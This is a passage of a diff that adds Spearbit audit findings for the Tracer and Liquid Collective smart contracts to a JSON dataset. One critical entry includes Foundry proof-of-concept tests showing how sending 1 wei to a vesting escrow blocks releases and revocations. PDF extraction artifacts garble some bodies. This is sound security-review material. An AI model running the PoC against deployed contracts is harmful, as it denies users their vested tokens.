uniqueTokenHash)); ... }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Informational" + ] + }, + { + "title": "No event exists for users self-claiming commits", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "There is no event emitted when a user self-claims a previous commit for themselves, in contrast to claim() which does emit the PaidRequestExecution event.", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Informational" + ] + }, + { + "title": "Mixups of types and scaling factors", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "There are a few findings that are related to mixups of types or scaling factors. The following types and scaling factors are used: uint (no scaling) uint (WAD scaling) ABDKMathQuad ABDKMathQuad (WAD scaling) Solidity >0.8.9s user defined value types could be used to prevent mistakes. This will require several typecasts, but they dont add extra gas costs.", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Informational" + ] + }, + { + "title": "Missing events for setInvariantCheck() and setAutoClaim() in PoolFactory", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "Events should be emitted for access-controlled critical functions, and functions that set protocol parameters or affect the protocol in significant ways.", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Informational" + ] + }, + { + "title": "Terminology used for tokens and oracles is not clear and consistent across codebase", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "Different terms are used across the codebase to address the different tokens, leading to some mixups. Assuming a pair BTC/USDC is being tracked with WETH as collateral, we think the following definitions apply: collateral token == quote token == settlement token == WETH pool token == long token + short token == long BTC/USDC + short BTC/USDC As for the oracles: settlementEthOracle is the oracle for settlement in ETH (WETH/ETH) oracleWrapper is the oracle for BTC/USDC Here is an example of a mixup: The comments in getMint() and getBurn() are different while their result should be similar. It seems the comment on getBurn() has reversed settlement and pool tokens. * @notice Calculates the number of pool tokens to mint, given some settlement token amount and a ,! price ... * @return Quantity of pool tokens to mint ... function getMint(bytes16 price, uint256 amount) public pure returns (uint256) { ... } * @notice Calculate the number of settlement tokens to burn, based on a price and an amount of ,! pool tokens //settlement & pool seem reversed ... * @return Quantity of pool tokens to burn ... function getBurn(bytes16 price, uint256 amount) public pure returns (uint256) { ... } The settlementTokenPrice variable in keeperGas() is misleading and not clear whether it is Eth per Settlement or Settlement per Eth. contract PoolKeeper is IPoolKeeper, Ownable { function keeperGas(..) public view returns (uint256) { int256 settlementTokenPrice = ,! IOracleWrapper(ILeveragedPool(_pool).settlementEthOracle()).getPrice(); ... } }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Informational" + ] + }, + { + "title": "Incorrect NatSpec and comments", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Tracer-Spearbit-Security-Review.pdf", + "body": "Some NatSpec documentation and comments contain incorrect or unclear information. In PoolSwapLibraryL283-L293, the NatSpec for the isBeforeFrontRunningInterval() function refers to uncom- mitment, which is not longer supported. * @notice Returns true if the given timestamp is BEFORE the frontRunningInterval starts, * function isBeforeFrontRunningInterval(...) which is allowed for uncommitment. In LeveragedPool.sol#L511 the NatSpec for the withdrawQuote() function notes that the pool should not be paused while the require checks that it is paused. * @dev Pool must not be paused function withdrawQuote() ... { require(paused, \"Pool is live\"); In LeveragedPool.sol#L47 the comment is unclear, as it references a singular update interval but the mapping points to arrays. // The most recent update interval in which a user committed mapping(address => uint256[]) public unAggregatedCommitments; In PoolToken.sol#L16-L23 both the order and the meaning of the documentation are wrong. The @param lines order should be switched. @param amount Pool tokens to burn should be replaced with @param amount Pool tokens to mint @param account Account to burn pool tokens to should be replaced with @param account Account to mint pool tokens to /** * @notice Mints pool tokens - * @param amount Pool tokens to burn - * @param account Account to burn pool tokens to + * @param account Account to mint pool tokens to + * @param amount Pool tokens to mint */ function mint(address account, uint256 amount) external override onlyOwner { ... } In PoolToken.sol#L25-L32 the order of the @param lines is reversed. 47 /** * @notice Burns pool tokens - * @param amount Pool tokens to burn - * @param account Account to burn pool tokens from + * @param account Account to burn pool tokens from + * @param amount Pool tokens to burn */ function burn(address account, uint256 amount) external override onlyOwner { ... } In PoolFactory.sol#L176-L203 the NatSpec @param for poolOwner is missing. It would also be suggested to change the parameter name from poolOwner to pool, since the parameter received from deployPool is the address of the pool and not the owner of the pool. /** * @notice Deploy a contract for pool tokens + * @param pool The pool address, owner of the Pool Token * @param leverage Amount of leverage for pool * @param deploymentParameters Deployment parameters for parent function * @param direction Long or short token, L- or S- * @return Address of the pool token */ function deployPairToken( - + address poolOwner, address pool, string memory leverage, PoolDeployment memory deploymentParameters, string memory direction ) internal returns (address) { ... pairToken.initialize(poolOwner, poolNameAndSymbol, poolNameAndSymbol, settlementDecimals); pairToken.initialize(pool, poolNameAndSymbol, poolNameAndSymbol, settlementDecimals); ... - + } In PoolSwapLibrary.sol#L433-L454 the comments for two of the parameters of function getMintWithBurns() are reversed. * @param amount ... * @param oppositePrice ... ... function getMintWithBurns( ... bytes16 oppositePrice, uint256 amount, ... ) public pure returns (uint256) { ... In ERC20_Cloneable.sol#L46-L49 a comment at the constructor of contract ERC20_Cloneable mentions a default value of 18 for decimals. However, it doesnt use this default value, but the supplied parameter. Moreover, a comment at the constructor of ERC20_Cloneable contract mentions _setupDecimals. This is probably a reference to an old version of the OpenZeppelin ERC20 contracts, and no longer relevant. Additionally, the comments say the values are immutable, but they are set in the initialize() function. 48 @dev Sets the values for {name} and {symbol}, initializes {decimals} with * a default value of 18. * To select a different value for {decimals}, use {_setupDecimals}. * * construction. All three of these values are immutable: they can only be set once during ... constructor(string memory name_, string memory symbol_, uint8 decimals_) ERC20(name_, symbol_) { _decimals = decimals_; } function initialize(address _pool, string memory name_, string memory symbol_, uint8 decimals_) ,! external initializer { owner = _pool; _name = name_; _symbol = symbol_; _decimals = decimals_; }", + "labels": [ + "Spearbit", + "Tracer", + "Severity: Informational" + ] + }, + { + "title": "Calculation of CurrentValidatorExitsDemand and TotalValidatorExitsRequested using unsolicited exits can happen at the end of _setStoppedValidatorCounts(...)", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollectivePR-Spearbit-Security-Review.pdf", + "body": "Calculation of CurrentValidatorExitsDemand and TotalValidatorExitsRequested using unso- licited exits can happen at the end of _setStoppedValidatorCounts(...) to avoid extra operations like taking minimum per iteration of the loops. Note that: an = an(cid:0)1 (cid:0) min(an(cid:0)1, bn) ) an = a0 (cid:0) min(a0, n X i=1 bn) = max(0, a0 (cid:0) n X i=1 bn)", + "labels": [ + "Spearbit", + "LiquidCollectivePR", + "Severity: Informational" + ] + }, + { + "title": "use _setCurrentValidatorExitsDemand", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollectivePR-Spearbit-Security-Review.pdf", + "body": "If an update is needed for CurrentValidatorExitsDemand in _setStoppedValidatorCounts(...), the internal function _setCurrentValidatorExitsDemand is not used.", + "labels": [ + "Spearbit", + "LiquidCollectivePR", + "Severity: Informational" + ] + }, + { + "title": "Changes to the emission of RequestedValidatorExits event during catch-up", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollectivePR-Spearbit-Security-Review.pdf", + "body": "The event log will be different between the old and new implementations. In the old implementation, the latest RequestedValidatorExits event in the logs will always contain the most up-to-date count of requested exits (count) of an operator after a \"catch-up\" attempt. This is because a new RequestedValidatorExits event with the up-to-date currentStoppedCount is emitted at the end of the async requestValidatorExits function call. However, in the new implementation, the latest RequestedValidatorExits event in the logs contains the outdated or previous count of an operator after a \"catch-up\" attempt since a new RequestedValidatorExits event is not emitted at the end of the Oracle reporting transaction. If any off-chain component depends on the latest RequestedValidatorExits event in the logs to determine the count of requested exits (count), it might potentially cause the off-chain component to read and process outdated information. For instance, an operator's off-chain component might be reading the count within the latest Request- edValidatorExits event in the logs and comparing it against its internal counter to decide if more validators need to be exited. The following shows the discrepancy between the events emitted between the old and new implementations. Catch-up implementation in the previous design 1) Catch-up was carried out async when someone called the requestValidatorExits > _pickNextValida- torsToExitFromActiveOperators function 2) Within the _pickNextValidatorsToExitFromActiveOperators function. Assume an operator called opera It will attempt to \"catch-up\" by and its currentRequestedExits is less than the currentStoppedCount. performing the following actions: 1) Emit UpdatedRequestedValidatorExitsUponStopped(opera, currentRequestedExits, currentStoppedCount) event. 2) Let x be the no. of validator count to \"catch-up\" (x = currentStoppedCount (cid:0) currentRequestedExits) 3) opera.picked will be incremented by x. Since opera.picked has not been initialized yet, opera.picked = x 3) Assume that the opera is neither the operator with the highest validation count nor the operator with the second highest. As such, opera is not \"picked\" to exit its validators 5 4) Near the end of the _pickNextValidatorsToExitFromActiveOperators function, it will loop through all op- erators that have operator .picked > 0 and perform some actions. The following actions will be performed against opera since opera.picked > 0: 1) Emit RequestedValidatorExits(opera, currentStoppedCount) event 2) Set opera.requestedExits = currentStoppedCount. 5) After the transaction, two events were emitted for opera to indicate a catch-up had been attempted. UpdatedRequestedValidatorExitsUponStopped(opera, currentRequestedExits, currentStoppedCount) RequestedValidatorExits(opera, currentStoppedCount) Catch-up implementation in the new design 1. Catch-up was carried out within the _setStoppedValidatorCounts function during Oracle reporting. 2. Let _stoppedValidatorCounts[idx] be the currentStoppedCount AND operators.requestedExits be currentRequestedExits 3. Assume an operator called opera and its currentRequestedExits is less than the currentStoppedCount. It will attempt to \"catch-up\" by performing the following actions: 1. Emit UpdatedRequestedValidatorExitsUponStopped(opera, currentRequestedExits, currentStoppedCount) event. 2. Set opera.requestedExits = currentStoppedCount. 4. After the transaction, only one event was emitted for opera to indicate a catch-up had been attempted. UpdatedRequestedValidatorExitsUponStopped(opera, currentRequestedExits, currentStoppedCount) In addition, as per the comment below, it was understood that unsolicited exits are considered as if exit requests were performed for them. In this case, the latest RequestedValidatorExits event in the logs should reflect the most up-to-date count of exit requests for an operator including unsolicited exits at any time. File: OperatorsRegistry.1.sol 573: ,! 574: ,! were performed for them vars.currentValidatorExitsDemand); // we decrease the demand, considering unsollicited exits as if the exit requests vars.currentValidatorExitsDemand -= LibUint256.min(unsollicitedExits,", + "labels": [ + "Spearbit", + "LiquidCollectivePR", + "Severity: Informational" + ] + }, + { + "title": "A malicious user could DOS a vesting schedule by sending only 1 wei of TLC to the vesting escrow address", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "An external user who owns some TLC tokens could DOS the vesting schedule of any user by sending just 1 wei of TLC to the escrow address related to the vesting schedule. By doing that: The creator of the vesting schedule will not be able to revoke the vesting schedule. The beneficiary of the vesting schedule will not be able to release any vested tokens until the end of the vesting schedule. Any external contracts or dApps will not be able to call computeVestingReleasableAmount . In practice, all the functions that internally call _computeVestingReleasableAmount will revert because of an un- derflow error when called before the vesting schedule ends. The underflow error leasableAmount will enter uint256 releasedAmount = _computeVestedAmount(_vestingSchedule, _vestingSchedule.end) - balanceOf(_escrow); is thrown because, when called before the schedule ends, _computeVestingRe- try to compute the if (_time < _vestingSchedule.end) branch and will In this case, _computeVestedAmount(_vestingSchedule, _vestingSchedule.end) will always be lower than balanceOf(_escrow) and the contract will revert with an underflow error. When the vesting period ends, the contract will not enter the if (_time < _vestingSchedule.end) and the user will be able to gain the whole vested amount plus the extra amount of TLC sent to the escrow account by the malicious user. Scenario: 1) Bob owns 1 TLC token. 2) Alluvial creates a vesting schedule for Alice like the following example: createVestingSchedule( VestingSchedule({ start: block.timestamp, cliffDuration: 1 days, lockDuration: 0, duration: 10 days, period: 1 days, amount: 10, beneficiary: alice, delegatee: address(0), revocable: true }) ); 3) Bob sends 1 TLC token to the vesting schedule escrow account of the Alice vesting schedule. 8 4) After the cliff period, Alice should be able to release 1 TLC token. Because now balanceOf(_escrow) is 11 it will underflow as _computeVestedAmount(_vestingSchedule, _vestingSchedule.end) returns 10. Find below a test case showing all three different DOS scenarios: //SPDX-License-Identifier: MIT pragma solidity 0.8.10; import \"forge-std/Test.sol\"; import \"../src/TLC.1.sol\"; contract WrappedTLC is TLCV1 { function deterministicVestingEscrow(uint256 _index) external view returns (address escrow) { return _deterministicVestingEscrow(_index); } } contract SpearVestTest is Test { WrappedTLC internal tlc; address internal escrowImplem; address internal initAccount; address internal bob; address internal alice; address internal carl; function setUp() public { initAccount = makeAddr(\"init\"); bob = makeAddr(\"bob\"); alice = makeAddr(\"alice\"); carl = makeAddr(\"carl\"); tlc = new WrappedTLC(); tlc.initTLCV1(initAccount); } function testDOSReleaseVestingSchedule() public { // send Bob 1 vote token vm.prank(initAccount); tlc.transfer(bob, 1); // create a vesting schedule for Alice vm.prank(initAccount); createVestingSchedule( VestingSchedule({ start: block.timestamp, cliffDuration: 1 days, lockDuration: 0, duration: 10 days, period: 1 days, amount: 10, beneficiary: alice, delegatee: address(0), revocable: true }) ); address aliceEscrow = tlc.deterministicVestingEscrow(0); // Bob send one token directly to the Escrow contract of alice 9 vm.prank(bob); tlc.transfer(aliceEscrow, 1); // Cliff period has passed and Alice try to get the first batch of the vested token vm.warp(block.timestamp + 1 days); vm.prank(alice); // The transaction will revert for UNDERFLOW because now the balance of the escrow has been ,! increased externally vm.expectRevert(stdError.arithmeticError); tlc.releaseVestingSchedule(0); // Warp at the vesting schedule period end vm.warp(block.timestamp + 9 days); // Alice is able to get the whole vesting schedule amount // plus the token sent by the attacker to the escrow contract vm.prank(alice); tlc.releaseVestingSchedule(0); assertEq(tlc.balanceOf(alice), 11); } function testDOSRevokeVestingSchedule() public { // send Bob 1 vote token vm.prank(initAccount); tlc.transfer(bob, 1); // create a vesting schedule for Alice vm.prank(initAccount); createVestingSchedule( VestingSchedule({ start: block.timestamp, cliffDuration: 1 days, lockDuration: 0, duration: 10 days, period: 1 days, amount: 10, beneficiary: alice, delegatee: address(0), revocable: true }) ); address aliceEscrow = tlc.deterministicVestingEscrow(0); // Bob send one token directly to the Escrow contract of alice vm.prank(bob); tlc.transfer(aliceEscrow, 1); // The creator decide to revoke the vesting schedule before the end timestamp // It will throw an underflow error vm.prank(initAccount); vm.expectRevert(stdError.arithmeticError); tlc.revokeVestingSchedule(0, uint64(block.timestamp + 1)); } function testDOSComputeVestingReleasableAmount() public { // send Bob 1 vote token vm.prank(initAccount); tlc.transfer(bob, 1); // create a vesting schedule for Alice 10 vm.prank(initAccount); createVestingSchedule( VestingSchedule({ start: block.timestamp, cliffDuration: 1 days, lockDuration: 0, duration: 10 days, period: 1 days, amount: 10, beneficiary: alice, delegatee: address(0), revocable: true }) ); address aliceEscrow = tlc.deterministicVestingEscrow(0); // Bob send one token directly to the Escrow contract of alice vm.prank(bob); tlc.transfer(aliceEscrow, 1); vm.expectRevert(stdError.arithmeticError); uint256 releasableAmount = tlc.computeVestingReleasableAmount(0); // Warp to the end of the vesting schedule vm.warp(block.timestamp + 10 days); releasableAmount = tlc.computeVestingReleasableAmount(0); assertEq(releasableAmount, 11); } struct VestingSchedule { uint256 start; uint256 cliffDuration; uint256 lockDuration; uint256 duration; uint256 period; uint256 amount; address beneficiary; address delegatee; bool revocable; } function createVestingSchedule(VestingSchedule memory config) internal returns (uint256) { return createVestingScheduleStackOptimized(config); } function createVestingScheduleStackOptimized(VestingSchedule memory config) internal returns (uint256) { ,! return tlc.createVestingSchedule( uint64(config.start), uint32(config.cliffDuration), uint32(config.duration), uint32(config.period), uint32(config.lockDuration), config.revocable, config.amount, config.beneficiary, config.delegatee ); } 11 }", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Critical Risk" + ] + }, + { + "title": "Coverage funds might be pulled not only for the purpose of covering slashing losses", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "The newly introduced coverage fund is a smart contract that holds ETH to cover a potential lsETH price decrease due to unexpected slashing events. Funds might be pulled from CoverageFundV1 to the River contract through setConsensusLayerData to cover the losses and keep the share price stable In practice, however, it is possible that these funds will be pulled not only in emergency events. _maxIncrease is used as a measure to enforce the maximum difference between prevTotalEth and postTotalEth, but in practice, it is being used as a mandatory growth factor in the context of coverage funds, which might cause the pulling of funds from the coverage fund to ensure _maxIncrease of revenue in case fees are not high enough.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Medium Risk" + ] + }, + { + "title": "Consider preventing CoverageFundAddress to be set as address(0)", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "In the current implementation of River.setCoverageFund and CoverageFundAddress.set both func- tion do not revert when the _newCoverageFund address parameter is equal to address(0). If the Coverage Fund address is empty, the River._pullCoverageFunds function will return earlier and will not pull any coverage fund.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Medium Risk" + ] + }, + { + "title": "CoverageFund.initCoverageFundV1 might be front-runnable", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "Upgradeable contracts are used in the project, mostly relying on a TUPProxy contract. Initializing a contract is a 2 phase process where the first call is the actual deployment and the second call is a call to the init function itself. From our experience with the repository, the upgradeable contracts deployment scripts are using the TUPProxy correctly, however in that case we were not able to find the deployment script for CoverFund, so we decided to raise this point to make sure you are following the previous policy also for this contract.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Low Risk" + ] + }, + { + "title": "Account owner of the minted TLC tokens must call delegate to own vote power of initial minted tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "ken.delegate(accountOwner) to auto-delegate to itself, otherwise it will have zero voting power. the minted TLC tokens must The _account owner of remember to call tlcTo- Without doing that anyone (even with just 1 voting power) could make any proposal pass and in the future manage the DAO proposing, rejecting or accepting/executing proposals. As the OpenZeppelin ERC20 documentation says: By default, token balance does not account for voting power. This makes transfers cheaper. The downside is that it requires users to delegate to themselves in order to activate checkpoints and have their voting power tracked.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Low Risk" + ] + }, + { + "title": "Consider using unchecked block to save some gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "Because of the if statement, it is impossible for vestedAmount - releasedAmount to underflow, thus allowing the usage of the unchecked block to save a bit of gas.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Gas Optimization" + ] + }, + { + "title": "createVestingSchedule allows the creation of a vesting schedule that could release zero tokens after a period has passed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "Depending on the value of duration or amount it is possible to create a vesting schedule that would release zero token after a whole period has elapsed. This is an edge case scenario but would still be possible given that createVestingSchedule can be called by anyone and not only Alluvial. See the following test case for an example //SPDX-License-Identifier: MIT pragma solidity 0.8.10; import \"forge-std/Test.sol\"; import \"../src/TLC.1.sol\"; contract WrappedTLC is TLCV1 { function deterministicVestingEscrow(uint256 _index) external view returns (address escrow) { return _deterministicVestingEscrow(_index); } } contract SpearVestTest is Test { WrappedTLC internal tlc; address internal escrowImplem; address internal initAccount; address internal bob; address internal alice; address internal carl; function setUp() public { initAccount = makeAddr(\"init\"); bob = makeAddr(\"bob\"); alice = makeAddr(\"alice\"); carl = makeAddr(\"carl\"); tlc = new WrappedTLC(); tlc.initTLCV1(initAccount); } function testDistributeZeroPerPeriod() public { // create a vesting schedule for Alice vm.prank(initAccount); createVestingSchedule( VestingSchedule({ start: block.timestamp, cliffDuration: 0 days, lockDuration: 0, duration: 365 days, period: 1 days, amount: 100, beneficiary: alice, delegatee: address(0), 15 revocable: true }) ); // One whole period pass and alice check how many tokens she can release vm.warp(block.timestamp + 1 days); uint256 releasable = tlc.computeVestingReleasableAmount(0); assertEq(releasable, 0); } struct VestingSchedule { uint256 start; uint256 cliffDuration; uint256 lockDuration; uint256 duration; uint256 period; uint256 amount; address beneficiary; address delegatee; bool revocable; } function createVestingSchedule(VestingSchedule memory config) internal returns (uint256) { return createVestingScheduleStackOptimized(config); } function createVestingScheduleStackOptimized(VestingSchedule memory config) internal returns (uint256) { ,! return tlc.createVestingSchedule( uint64(config.start), uint32(config.cliffDuration), uint32(config.duration), uint32(config.period), uint32(config.lockDuration), config.revocable, config.amount, config.beneficiary, config.delegatee ); } }", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "CoverageFund - Checks-Effects-Interactions best practice is violated", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "We were not able to find any concrete instances of harmful reentrancy attack vectors in this contract, but it's recommended to follow the Checks-effects-interactions pattern anyway.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "River contract allows setting an empty metadata URI", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "The current implementation of River.setMetadataURI and MetadataURI.set both allow the current value of the metadata URI to be updated to an empty string.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "Consider requiring that the _cliffDuration is a multiple of _period", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "When a vesting schedule is created via _createVestingSchedule, the only check made on _period parameter (other than being greater than zero) is that the _duration must be a multiple of _period. If after the _cliffDuration the user can already release the matured vested tokens, it could make sense to also require that _cliffDuration % _period == 0", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "Add documentation about the scenario where a vesting schedule can be created in the past", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "In the current implementation of ERC20VestableVotesUpgradeable _createVestingSchedule func- tion, there is no check for the _start value. This means that the creator of a vesting schedule could create a schedule that starts in the past. Allowing the creation of a vesting schedule with a past _start also influences the behavior of _revokeVestingSchedule (see ERC20VestableVotesUpgradeableV1 createVestingSchedule allows the creation of vesting schedules that have already ended and cannot be revoked).", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "ERC20VestableVotesUpgradeableV1 createVestingSchedule allows the creation of vesting schedules that have already ended and cannot be revoked", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "The current implementation of _createVestingSchedule allows the creation of vesting schedules that Start in the past: _start < block.timestamp. Have already ended: _start + _duration < block.timestamp. Because of this behavior, in case of the creation of a past vesting schedule that has already ended The _beneficiary can instantly call (if there's no lock period) releaseVestingSchedule to release the whole amount of tokens. The creator of the vesting schedule cannot call revokeVestingSchedule because the new end would be in the past and the transaction would revert with an InvalidRevokedVestingScheduleEnd error. The second scenario is particularly important because it does not allow the creator to reduce the length or remove the schedule entirely in case the schedule has been created mistakenly or with a misconfiguration (too many token vested, lock period too long, etc...).", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "getVestingSchedule returns misleading information if the vesting token creator revokes the sched- ule", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "The getVestingSchedule function returns the information about the created vesting schedule. The duration represents the number of seconds of the vesting period and the amount represents the number of tokens that have been scheduled to be released after the period end (or after lockDuration if it has been configured to be greater than end). If the creator of the vesting schedule calls revokeVestingSchedule, only the end of the vesting schedule struct will be updated. If external contracts or dApps rely only on the getVestingSchedule information there could be scenarios where they display or base their logic on wrong information. Consider the following example. Alluvial creates a vesting schedule for alice with the following config 18 { } \"start\": block.timestamp, \"cliffDuration\": 1 days, \"lockDuration\": 0, \"duration\": 10 days, \"period\": 1 days, \"amount\": 10, \"beneficiary\": alice, \"delegatee\": alice, \"revocable\": true This means that after 10 days, Alice would own in her balance 10 TLC tokens. If Alluvial calls revokeVestingSchedule before the cliff period ends, all of the tokens will be returned to Alluvial but the getVestingSchedule function would still display the same information with just the end attribute updated. An external dApp or contract that does not check the new end and compares it to cliffDuration, lockDura- tion, and period but only uses the amount would display the wrong number of vested tokens for Alice at a given timestamp.", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "The computeVestingVestedAmount will return the wrong amount of vested tokens if the creator of the vested schedule revokes the schedule", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "The computeVestingVestedAmount will return the wrong amount of vested tokens if the creator of the vested schedule revokes the schedule. This function returns the value returned by _computeVestedAmount that relies on duration and amount while the only attribute changed by revokeVestingSchedule is the end. 19 function _computeVestedAmount(VestingSchedules.VestingSchedule memory _vestingSchedule, uint256 _time) internal pure returns (uint256) { if (_time < _vestingSchedule.start + _vestingSchedule.cliffDuration) { // pre-cliff no tokens have been vested return 0; } else if (_time >= _vestingSchedule.start + _vestingSchedule.duration) { // post vesting all tokens have been vested return _vestingSchedule.amount; } else { uint256 timeFromStart = _time - _vestingSchedule.start; // compute tokens vested for completly elapsed periods uint256 vestedDuration = timeFromStart - (timeFromStart % _vestingSchedule.period); return (vestedDuration * _vestingSchedule.amount) / _vestingSchedule.duration; } } If the creator revokes the schedule, the computeVestingVestedAmount would return more tokens compared to the amount that the user has vested in reality. Consider the following example. Alluvial creates a vesting schedule with the following config { } \"start\": block.timestamp, \"cliffDuration\": 1 days, \"lockDuration\": 0, \"duration\": 10 days, \"period\": 1 days, \"amount\": 10, \"beneficiary\": alice, \"delegatee\": alice, \"revocable\": true Alluvial then calls revokeVestingSchedule(0, uint64(block.timestamp + 5 days));. The effect of this trans- action would return 5 tokens to Alluvial and set the new end to block.timestamp + 5 days. If alice calls computeVestingVestedAmount(0) at the time uint64(block.timestamp + 7 days), it would return 7 because _computeVestedAmount would execute the code in the else branch. But alice cannot have more than 5 vested tokens because of the previous revoke. If alice calls computeVestingVestedAmount(0) at the time uint64(block.timestamp + duration)it would return 10 because _computeVestedAmount would execute the code in the else if (_time >= _vestingSchedule.start + _vestingSchedule.duration) branch. But alice cannot have more than 5 vested tokens because of the previous revoke. Attached test below to reproduce it: //SPDX-License-Identifier: MIT pragma solidity 0.8.10; import \"forge-std/Test.sol\"; import \"../src/TLC.1.sol\"; contract WrappedTLC is TLCV1 { 20 function __computeVestingReleasableAmount(uint256 vestingID, uint256 _time) external view returns (uint256) { ,! return _computeVestingReleasableAmount( VestingSchedules.get(vestingID), _deterministicVestingEscrow(vestingID), _time ); } } contract SpearTLCTest is Test { WrappedTLC internal tlc; address internal escrowImplem; address internal initAccount; address internal creator; address internal bob; address internal alice; address internal carl; function setUp() public { initAccount = makeAddr(\"init\"); creator = makeAddr(\"creator\"); bob = makeAddr(\"bob\"); alice = makeAddr(\"alice\"); carl = makeAddr(\"carl\"); tlc = new WrappedTLC(); tlc.initTLCV1(initAccount); } function testIncorrectComputeVestingVestedAmount() public { vm.prank(initAccount); tlc.transfer(creator, 10); // create a vesting schedule for Alice vm.prank(creator); createVestingSchedule( VestingSchedule({ start: block.timestamp, cliffDuration: 0 days, lockDuration: 0, // no lock duration: 10 days, period: 1 days, amount: 10, beneficiary: alice, delegatee: address(0), revocable: true }) ); // creator call revokeVestingSchedule revoking the vested schedule setting the new end as half ,! of the duration // 5 tokens are returned to the creator and `end` is updated to the new value // this means also that at max alice will have 5 token vested (and releasable) vm.prank(creator); tlc.revokeVestingSchedule(0, uint64(block.timestamp + 5 days)); // We warp at day 7 of the schedule vm.warp(block.timestamp + 7 days); 21 // This should fail because alice at max have only 5 token vested because of the revoke assertEq(tlc.computeVestingVestedAmount(0), 7); // We warp at day 10 (we reached the total duration of the vesting) vm.warp(block.timestamp + 3 days); // This should fail because alice at max have only 5 token vested because of the revoke assertEq(tlc.computeVestingVestedAmount(0), 10); } struct VestingSchedule { uint256 start; uint256 cliffDuration; uint256 lockDuration; uint256 duration; uint256 period; uint256 amount; address beneficiary; address delegatee; bool revocable; } function createVestingSchedule(VestingSchedule memory config) internal returns (uint256) { return createVestingScheduleStackOptimized(config); } function createVestingScheduleStackOptimized(VestingSchedule memory config) internal returns (uint256) { ,! return tlc.createVestingSchedule( uint64(config.start), uint32(config.cliffDuration), uint32(config.duration), uint32(config.period), uint32(config.lockDuration), config.revocable, config.amount, config.beneficiary, config.delegatee ); } }", + "labels": [ + "Spearbit", + "LiquidCollective2", + "Severity: Informational" + ] + }, + { + "title": "Consider writing clear documentation on how the voting power and delegation works", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective2-Spearbit-Security-Review.pdf", + "body": "ERC20VotesUpgradeable contract. As the official OpenZeppelin documentation says (also reported in the Alluvial's natspec contract): ERC20VestableVotesUpgradeableV1 extension The an of is By default, token balance does not account for voting power. This makes transfers cheaper. The downside is that it requires users to delegate to themselves in order to activate checkpoints and have their voting power tracked. Because of how ERC20VotesUpgradeable behaves on voting power and delegation of voting power could be coun- terintuitive for normal users who are not aware of it, Alluvial should be very explicit on how users should act when a vesting schedule is created for them. When a Vote Token is transferred, ERC20VotesUpgradeable calls the hook _afterTokenTransfer function _afterTokenTransfer( address from, address to, uint256 amount ) internal virtual override { super._afterTokenTransfer(from, to, amount); _moveVotingPower(delegates(from), delegates(to), amount); } In this case, _moveVotingPower(delegates(from), delegates(to), amount); will decrease the voting power of delegates(from) by amount and will increase the voting power of delegates(to) by amount. This applies if some conditions are true, but you can see them here function _moveVotingPower( address src, address dst, uint256 amount ) private { if (src != dst && amount > 0) { if (src != address(0)) { (uint256 oldWeight, uint256 newWeight) = _writeCheckpoint(_checkpoints[src], _subtract, ,! amount); emit 